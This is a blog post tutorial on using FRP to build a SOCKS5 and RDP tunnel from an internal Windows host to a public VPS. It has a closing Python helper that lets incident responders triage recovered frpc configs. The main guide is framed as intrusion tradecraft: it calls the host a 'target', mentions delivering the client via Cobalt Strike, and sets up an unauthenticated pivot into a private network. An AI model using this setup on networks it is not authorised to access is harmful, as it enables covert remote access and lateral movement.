Establishing TCP/UDP Tunnels with FRP for Internal Network Access

Overview

FRP (Fast Reverse Proxy) is a lightweight, open-source reverse proxy tool designed to expose local services behind NATs or firewalls to the public internet. It supports multiple protocols including TCP, UDP, and HTTP, enabling flexible tunneling scenarios such as remote administration, service forwarding, and internal network reconnaissance.

Environment Setup

  • Public-facing server: A Linux VPS (e.g., Ubuntu or Kali) with a static IPv4 address.
  • Internal client: A Windows machine residing in a private network (e.g., 192.168.0.132).
  • Basic familiarity with command-line interfaces on both systems is assumed.

Server Configuration

After connecting to the VPS over SSH, determine the system architecture:

uname -m

For x86_64, download the corresponding release:

wget https://github.com/fatedier/frp/releases/download/v0.57.0/frp_0.57.0_linux_amd64.tar.gz
tar -xzf frp_0.57.0_linux_amd64.tar.gz
mv frp_0.57.0_linux_amd64 frp-server
cd frp-server

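Retain only the server files. The v0.57.0 archive ships TOML sample configs (frpc.toml, frps.toml), so remove the client binary and its sample config:

rm -f frpc frpc.toml

Create frps.ini (the legacy INI format used in this guide is deprecated but still accepted by this release):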

[common]
bind_addr = 0.0.0.0
bind_port = 7000
dashboard_addr = 0.0.0.0
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = securepass
token = shared_secret_2024
heartbeat_timeout = 90
max_pool_count = 10

Launch the server:

./frps -c frps.ini

Verify operation by visiting http://<vps-ip>:7500 and logging in with the configured credentials.

Client Deployment

Transfer frpc.exe and frpc.ini to the target Windows host (e.g., via Cobalt Strike, PowerShell, or manual upload).

Configure frpc.ini:

[common]
server_addr = 103.234.72.5
server_port = 7000
token = shared_secret_2024
pool_count = 5
protocol = tcp
health_check_type = tcp
health_check_interval_s = 60

[socks-proxy]
type = tcp
remote_port = 10000
plugin = socks5
use_encryption = true
use_compression = true

Start the client from PowerShell or CMD:

.\frpc.exe -c frpc.ini

Upon successful connection, the FRP dashboard will display an active client session.

Local Proxy Usage

Configure a SOCKS5 proxy in your browser or system settings:

  • Host: 103.234.72.5
  • Port: 10000

With the proxy enabled, requests to http://192.168.0.132/ (or any internal resource) are routed through the tunnel — effectively extending your local network reach.

Protocol Flexibility

To forward raw TCP traffic (e.g., RDP or SSH), replace the [socks-proxy] section with:

[rdp-forward]
type = tcp
remote_port = 3389
local_ip = 127.0.0.1
local_port = 3389

Then connect to <vps-ip>:3389 to access the internal RDP service.

For UDP-based forwarding (e.g., DNS or VoIP), adjust type and specify local_port/remote_port accordingly, ensuring protocol = udp is set in [common].
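
Added example for incident responders (not part of the original post and not frp project code): a triage helper that decides whether a recovered INI file is an frpc client config and summarizes which server it dials out to and what each proxy section publishes there. The function name triage_frpc_ini and the SAMPLE text are constructed for illustration; SAMPLE combines the two proxy sections shown on this page, and plugin_user is frp's legacy-INI key for SOCKS5 plugin authentication.

```python
import configparser

# Constructed sample: the frpc.ini sections from this page, as recovered from a host.
SAMPLE = """[common]
server_addr = 103.234.72.5
server_port = 7000
token = shared_secret_2024

[socks-proxy]
type = tcp
remote_port = 10000
plugin = socks5

[rdp-forward]
type = tcp
remote_port = 3389
local_ip = 127.0.0.1
local_port = 3389
"""

def triage_frpc_ini(text):
    """Return a summary of an frpc INI config, or None if text is not one."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    # An frpc config names the server it dials out to in [common];
    # an frps config has bind_port there instead and is skipped.
    if not cp.has_option("common", "server_addr"):
        return None
    common = cp["common"]
    report = {"server": common["server_addr"],
              "server_port": common.get("server_port", "7000"),  # frp default
              "findings": []}
    for name in cp.sections():
        sec = cp[name]
        if name == "common" or "remote_port" not in sec:
            continue
        public = "{}:{}".format(report["server"], sec["remote_port"])
        if sec.get("plugin") == "socks5":
            auth = "with" if "plugin_user" in sec else "without"
            report["findings"].append(
                "{}: SOCKS5 pivot into this host's network at {} ({} auth)"
                .format(name, public, auth))
        elif "local_port" in sec:
            report["findings"].append("{}: {} {}:{} published at {}".format(
                name, sec.get("type", "tcp"),
                sec.get("local_ip", "127.0.0.1"), sec["local_port"], public))
    return report
```

The server and server_port values in the report are the outbound connection to look for in firewall and proxy logs from the affected host.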

Tags: frp reverse-proxy tcp-tunneling udp-tunneling network-penetration

Posted on Sun, 17 May 2026 06:45:10 +0000 by TheCase